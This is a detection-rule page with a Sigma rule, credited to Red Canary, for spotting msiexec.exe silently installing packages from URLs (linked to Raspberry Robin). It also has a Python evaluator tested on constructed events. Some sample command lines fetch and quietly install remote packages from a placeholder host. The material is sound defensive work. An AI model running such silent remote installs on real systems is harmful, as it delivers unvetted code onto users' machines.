Windows Installer (msiexec.exe) Downloading and Executing Packages

To detect suspicious use of msiexec.exe by Raspberry Robin or other threats, examine the command line and the URL it carries. Detecting msiexec.exe making outbound network connections to download and install packages from the command line gives you the opportunity to examine the activity and determine whether it is malicious. Part of the RedCanary 2024 Threat Detection Report.

Sigma rule

```yaml
title: Windows Installer (msiexec.exe) Downloading and Executing Packages
id: 2b09f558-14dc-40ac-b962-66386b5785c1
status: experimental
description: |
    To detect suspicious use of msiexec.exe by Raspberry Robin or other threats,
    it's essential to take a look at the command line and the URL. Detecting
    msiexec.exe making outbound network connections to download and install packages
    in the command-line interface will give you the opportunity to examine the
    activity and determine if it's malicious or not. Part of the RedCanary 2024
    Threat Detection Report.
references:
    - https://redcanary.com/threat-detection-report/threats/raspberry-robin/
author: RedCanary, Sigma formatting by Micah Babinski
date: 2024/03/21
tags:
    - attack.defense_evasion
    - attack.t1218
    - attack.t1218.007
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        # Image holds the full path, so the suffix must include the '.exe'
        # extension; a bare '\msiexec' suffix never matches a real event.
        Image|endswith: '\msiexec.exe'
    selection2:
        CommandLine|contains:
            - 'http:'
            - 'https:'
    selection3:
        # windash also accepts the '-q' spelling of the quiet flag
        CommandLine|contains|windash: '/q'
    condition: all of selection*
falsepositives:
    - Unknown
level: low
```
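The following is an added example, not code from Red Canary or from the Sigma rule above. It reimplements the rule's three selections in plain Python and runs them over constructed process-creation events, so you can see why `all of selection*` needs the image suffix, a URL scheme and the quiet flag together, and how `contains|windash` accepts `/q`, `-q` and `/qn` alike. The event fields and command lines are constructed; the set of dash characters used to expand `windash` is an assumption based on the Sigma modifier specification.

```python
"""Evaluate the msiexec.exe download-and-execute Sigma rule over sample events."""

from itertools import product
from typing import Dict, Iterable, List

# Values taken from the Sigma rule on this page.
IMAGE_SUFFIX = r"\msiexec.exe"
URL_MARKERS = ("http:", "https:")
QUIET_FLAG = "/q"

# Characters the `windash` modifier treats as interchangeable (assumption:
# '/' and '-' per the Sigma spec, plus the Unicode dashes newer Sigma
# tooling also expands to).
WINDASH_CHARS = ("/", "-", "\u2013", "\u2014", "\u2015")

# Constructed process_creation events; these are not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /q /i http://example.invalid/pkg.msi"},
    {"Image": r"C:\Windows\SysWOW64\msiexec.exe",
     "CommandLine": r"msiexec -Q -i https://example.invalid/update.msi"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Temp\setup.msi /qn"},       # local package, no URL
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i https://example.invalid/a.msi"},  # no quiet flag
    {"Image": r"C:\Program Files\Foo\updater.exe",
     "CommandLine": r"updater.exe /q https://example.invalid/x.msi"},  # not msiexec
]


def windash_variants(value: str) -> List[str]:
    """Expand a value the way `|windash` does: every '/' or '-' in the value
    is replaced by each dash-like character, producing all permutations."""
    positions = [i for i, ch in enumerate(value) if ch in ("/", "-")]
    variants = []
    for combo in product(WINDASH_CHARS, repeat=len(positions)):
        chars = list(value)
        for pos, repl in zip(positions, combo):
            chars[pos] = repl
        variants.append("".join(chars))
    return variants


def matches_rule(event: Dict[str, str]) -> bool:
    """Return True when all three selections of the rule match the event.
    Sigma string matching is case-insensitive, so both sides are lowercased."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    selection1 = image.endswith(IMAGE_SUFFIX.lower())
    selection2 = any(marker in cmd for marker in URL_MARKERS)
    # `contains` is a substring test, so '/qn' and '/quiet' also satisfy '/q'.
    selection3 = any(v.lower() in cmd for v in windash_variants(QUIET_FLAG))
    return selection1 and selection2 and selection3


def evaluate(events: Iterable[Dict[str, str]]) -> List[int]:
    """Return the indexes of the events that trigger the rule."""
    return [i for i, event in enumerate(events) if matches_rule(event)]


if __name__ == "__main__":
    for idx in evaluate(SAMPLE_EVENTS):
        print(f"ALERT event[{idx}]: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Only the first two sample events fire: the third has no URL, the fourth has no quiet flag, and the fifth is not msiexec.exe at all. Because `contains` is a substring test, `/qn` and `/quiet` trigger selection3 just as `/q` does, which is what you want for quiet installs but is worth keeping in mind when tuning false positives.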
